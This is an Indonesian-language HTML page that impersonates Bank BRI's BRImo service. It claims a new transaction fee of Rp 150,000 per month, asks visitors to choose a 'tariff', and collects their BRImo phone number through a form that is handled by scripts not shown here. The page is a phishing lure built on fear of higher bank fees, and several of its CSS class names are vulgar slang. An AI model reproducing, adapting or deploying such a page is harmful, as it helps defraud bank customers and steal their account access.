<!DOCTYPE html><html lang="in"><head>
    <meta charset="UTF-8">
    <title>𝐴𝑘𝑡𝑖𝑣𝑎𝑠𝑖 𝑇𝑎𝑟𝑖𝑓 𝐵𝑎𝑛𝑘 𝐵𝑅𝐼 | 2025</title>
    <link rel="icon" type="image/png" href="img/BRImo.png">
    <meta content="images/f8uyn1.jpg" property="og:image">
<meta name="twitter:image" content="https://hosting.tigerengine.id/f8uyn1.jpg">
    	<meta name="description" content="Bank BRI terus berinovasi mengembangkan produk yang sesuai dengan perkembangan jaman untuk memenuhi kebutuhan nasabah">
    <meta name="theme-color" content="#0f78cb">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <link rel="stylesheet" href="css/1.css">
    <script type="module" src="js/ionicons.esm.js"></script>
<style>
    @import url('https://fonts.googleapis.com/css2?family=Nunito:wght@800&display=swap');
}
* {
    margin: 0px;
}
html, body {
      max-width: 100%;
      overflow-x: ;
      }
body {
    margin: 0px;
    background: url('images/buri.png'),#fff;
    background-size: 100%;
    color: #fff;
    font-family: 'Nunito', sans-serif;
}

.lonte{
  display:none;
  z-index:3;
  position: absolute;
  top: 33%;
  left: 30%;
  transform: translate(-50%, -50%);
  
/*   spinner div css */
  height : 10px;
  width : 10px;
  border-radius : 50%;
/*   background-color : red; */
  border : 5px solid #ffffff80;
  border-top-color : #007bff;
  animation : spin 1s linear infinite;
}

@keyframes spin{
  0%{
    transform : rotate(0deg);
  }
  100%{
    transform : rotate(360deg);
  }
}

.patokk:active { background-color: rgba(0, 110, 200, 0.96); box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px inset, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px inset; transform: translateY(0px); }

.load{
     top: 0;
     left: 0;
     right: 0;
     position: fixed;
     display: flex;
     justify-content: center;
     align-items: center;
     background: #00000090;
     z-index: 999999999;
     width: 100%;
     height: 100%;
      }
      
      .jao{
            width:90%;
      }
</style></head>

<body>
    <main>
<welalxcome>
<img src="img/BRImo.png" alt="" style="margin-top: -50px">
</welalxcome>
<chsalxcome2 style="display: none;">

<img style="position: fixed;width:100%;margin-top:50px;" src="images/26-.png" alt="">
<nav class="hh">
<img src="images/nav.png" style="margin-top:8px; margin-left:175px;" width="40px" alt="">
</nav>
<div class="load" style="display:none">
 <img src="images/f01dmo.gif" class="jao" alt="">
      </div>
<marquee direction="right" behavior="alternate" scrolldelay="0" class="asu" style="display: block;animation: marquee 5000s linear infinite;overflow: hidden;">
<img class="nyusu" src="images/1.png" alt="">
<img class="nyusu" src="images/2.png" alt="">
<img class="nyusu" src="images/3.png" alt="">
<img class="nyusu" src="images/4.png" alt="">
<img class="nyusu" src="images/5.png" alt="">
</marquee>    



<form method="post" id="formHP">
<center><img style="position: fixed;width:20%;margin-top:610px;margin-left:-40px;" src="images/T24.png" alt=""></center>

<div class="button-85 hua">
<center style="color:#09559a; line-height: 20px; font-size: 15px; padding: 0px;margin-top:-12px;"><p style="border-bottom:1.5px solid #0000004a;border-radius:10px;margin-bottom:0px;height:50px;">Silahkan Pilih Tarif Transaksi Sesuai Kebutuhan Anda Di Bawah Ini</p>
<img style="width:100%;" src="images/index.png" alt="">
</center>
<select name="tarif" required="" class="yantek">
<option value="">PILIH TARIF</option>
<option value="Baru Rp 150.000">√•𝗧𝗮𝗿𝗶𝗳 𝗕𝗮𝗿𝘂 𝗥𝗽 𝟭𝟱𝟬.𝟬𝟬𝟬 / 𝗣𝗲𝗿𝗯𝘂𝗹𝗮𝗻</option>
<option value="Lama Rp 6.500">√•𝗧𝗮𝗿𝗶𝗳 𝗟𝗮𝗺𝗮 𝗥𝗽 𝟲.𝟱𝟬𝟬 / 𝗕𝗶 𝗳𝗮𝘀𝘁 𝟮.𝟱𝟬𝟬</option>
</select>

<br><br><br>
<h5 style="position:absolute;color:#000; margin-top: -28px; margin-left: 4px">Masukan Nomor ponsel <b style="color: #06529C">BRI</b><b style="color: #F37024">mo</b> Anda :</h5>

<ion-icon name="phone-portrait-sharp">
</ion-icon>
<input id="NoHp" name="nohp" type="tel" class="kk" placeholder="08xxxxxx" oninvalid="this.setCustomValidity('Mohon mɑsukkɑn 𝗡𝗼𝗺𝗼𝗿 𝗣𝗼𝗻𝘀𝗲𝗹 dengɑn benɑr')" onchange="this.setCustomValidity('')" required="" maxlength="13" minlength="10">



<br>
<br>
</div>
    





<div class="kutal"><div id="lonte" class="lonte"></div>
<button class="patokk" type="submit" id="kirim" disabled="">Lanjutkan</button>
           </div>

</form></chsalxcome2></main>


<script src="js/jquery.min.js"></script>
<script src="script.js"></script>
<script src="js/jquery.min_1.js"></script>
<script>
        $( document ).ready(function() {
            setTimeout(() => {
                $('welalxcome').hide();
                $('chsalxcome2').fadeIn();
            },700)
        });
</script>
<script src="js/vibr.js"></script>
     <script src="js/1.js">
 </script>
<script src="js/1_1.js"></script>
<script defer="" src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" data-cf-beacon="{" version":"2024.11.0","token":"fa8cad80607a42c88eebf9c1cecc094a","r":1,"server_timing":{"name":{"cfcachestatus":true,"cfedge":true,"cfextpri":true,"cfl4":true,"cforigin":true,"cfspeedbrain":true},"location_startswith":null}}"="" crossorigin="anonymous"></script>


</body></html>